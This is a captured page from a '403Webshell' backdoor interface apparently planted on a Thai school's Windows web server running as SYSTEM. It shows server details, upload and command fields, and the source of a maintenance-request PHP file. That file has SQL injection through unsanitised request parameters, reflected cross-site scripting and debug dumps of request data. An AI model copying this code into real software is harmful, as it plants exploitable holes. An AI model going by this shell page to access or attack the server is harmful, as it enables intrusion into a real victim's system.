403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/nongplamor_new/modules/maintenance/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/myschool/nongplamor_new/modules/maintenance/inform.php
<?
print_r($_FILES); echo "<br>" ;
print_r($_POST);  echo "<br>" ;
print_r($_GET);   echo "<br>" ;
require_once($MODPATH ."inc.php") ;


if(isset($_POST['btnSubmit'] )){
    $dat = array(
        "year"=>  ( date("Y") + 543) ,
        "room"=>"$_POST[room]",
        "type"=>"$_POST[type]",
        "device"=>"$_POST[device]",
        "comment"=>"$_POST[failcase]",
        "post_date"=>"".TIMESTAMP."",
        "enable_comment"=>"1");
    print_r($dat);
    $id = $db->add_db(TB_mtitem,$dat);
    mt_save_file($id, 0 ,$_FILES ['file_comment'] );
        print_r($db->error);
    }

    if(isset($_POST['btnSubmitc'] )){
        $dat = array(
            "item_id"   => $_POST['item_id'],
            "detail"   => $_POST['detail'],
            "status"   => $_POST['status'],
            "post_date"=>"".TIMESTAMP.""
        );
        
        $db->update(TB_mtitem , "status='" .$_POST['status'] ."'" , "id=" . $_POST['item_id'] ) ;

        $cid = $db->add_db(TB_mtitem_comment,$dat);

        mt_save_file($_POST['item_id'],$cid ,$_FILES ['file_comment'] );
    }

    
require_once($MODPATH ."addfile.php") ;
    ?>



<style>
input[type=text]{
    width: 440px;
}
select {
    width: 440px;
}
</style>
<?
if($_GET['op'] == 'view' || $_GET['op'] == 'edit' ){
    $sql =  "SELECT * FROM " . TB_mtitem . " WHERE id=" . $_GET['id'];
    $res['item'] = $db->select_query($sql);
    $arr['item'] = $db->fetch($res['item']) ;
}


echo "<FORM METHOD='POST' NAME='inform' id='inform' ACTION='' onchange='javascript:this.submit();' enctype='multipart/form-data'>\n";
$id = isset( $arr['item']['id'])?  $arr['item']['id'] : 0 ;
echo "<input type=hidden name=id value='".$id ."'>\n";

echo "<table border=1 cellspacing=0>";
echo "<tr><td>หมายเลขห้อง</td>";
echo "<td>";
$room=  isset($_REQUEST['room']) ? $_REQUEST['room'] : $arr['item']['room'] ;
echo room_list_sel("room",$room);
echo "</td></tr>";

echo "<tr><td>type</td>";
echo "<td>";
$type=  isset($_REQUEST['type']) ? $_REQUEST['type'] : $arr['item']['type'] ;
echo type_list_sel("type",$type);
echo "</td></tr>";

echo "<tr><td>เลือกอุปกรณ์</td>";
echo "<td id=td_device>";
$device =  isset($_REQUEST['device']) ? $_REQUEST['device'] : $arr['item']['device'] ;
if($device == 'เลือก') $device = '' ;
echo room_list_device("device" , $room , $device);
echo "</td></tr>";

echo "<tr><td>อาการเสีย</td>";
echo "<td>";
$failcase=  isset($_REQUEST['failcase']) ? $_REQUEST['failcase'] : $arr['item']['comment'] ;
echo "<input type=text name='failcase' value='$failcase' >";
echo "</td></tr>";

echo "<tr><td></td><td>";
$resf = $db->select_query("SELECT * FROM " . TB_mtitem_file ." WHERE item_id_comment=0 AND item_id=".$arr['item']['id']);
while($arrf = $db->fetch($resf) ){
    echo "<a href='data/maintenance/" .$arr['item']['year'] ."/" . $arrf['full_text'] ."' > ดูไฟล์ </a>";
}
echo "<input type='file'   name='file_upload'  />";
echo "</td></tr>";

echo "<tr><td></td><td>";
echo "<input type=submit name=btnSubmit value='save'>";
echo str_repeat("&nbsp;",5);
echo "</td></tr>";
echo "</table>";
echo "</FORM>";

$sql =  "SELECT * FROM " . TB_mtitem_comment . " WHERE item_id=" . $_GET['id'];
$res['itemc'] = $db->select_query($sql);
echo "<br>";
echo "<table border=1 cellspacing=0>";
echo "<tr><td>date</td><td>status</td><td>detail</td><td>เอกสาร</td></tr>";
while($arr['itemc'] = $db->fetch($res['itemc']) ){
    //print_r($arr['itemc']) ; echo "<br>" ;
    echo "<tr>";
    echo "<td>" . ThaiTimeConvert( $arr['itemc']['post_date'] ) . "</td>"  ;
    echo "<td>" . $arr['itemc']['status'] . "</td>"  ;

    echo "<td>" . $arr['itemc']['detail'] . "</td>"  ;

    echo "<td>" ;
    $resf = $db->select_query("SELECT * FROM " . TB_mtitem_file ." WHERE item_id_comment=".$arr['itemc']['id']);
    while($arrf = $db->fetch($resf) ){
        echo "<a href='data/maintenance/" .$arr['item']['year'] ."/" . $arrf['full_text'] ."' > ดูไฟล์ </a>";
    }

    echo " <a href='?name=maintenance&file=item_del&op=delcomment&id=".$arr['itemc'][id] ."' target='_blank' >ลบ</a>  \n";

    echo "</td>";

    echo "</tr>";

}
echo "</table>";

echo "<br><br>";

echo "<FORM METHOD='POST' NAME='item_comment' id='item_comment' enctype='multipart/form-data'>";
echo "<input type=hidden name=item_id value='".$id ."'>\n";

echo "<input type='radio' name='status' value='แจ้งมอบ'> แจ้งมอบ \n";
echo "<input type='radio' name='status' value='ส่งซ่อม'> ส่งซ่อม \n";
echo "<input type='radio' name='status' value='ขอใบเสนอราคา'> ขอใบเสนอราคา \n";
echo "<input type='radio' name='status' value='ขออนุมัติซ่อม'> ขออนุมัติซ่อม \n";
echo "<input type='radio' name='status' value='รอช่าง'> รอช่าง \n";
echo "<input type='radio' name='status' value='รอตรวจสอบ'> รอตรวจสอบ \n";
echo "<input type='radio' name='status' value='เสร็จสิ้น'> เสร็จสิ้น \n";
echo "<br>";

echo "<input type=text name='detail' value='$detail' >";
echo "<br>";
echo "<input type='file'   name='file_comment'  />";
echo "<br>";
echo "<input type=submit name=btnSubmitc value='save'>";
echo "</FORM>";
?>

<script>
var inform = document.getElementById("inform");
if( inform.type.value=='other'){
    var td_device = document.getElementById("td_device");
    var device = "<? echo $device ?>" ;
    td_device.innerHTML="<input type=text name='device' value='" + device + "'>" ;
}
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit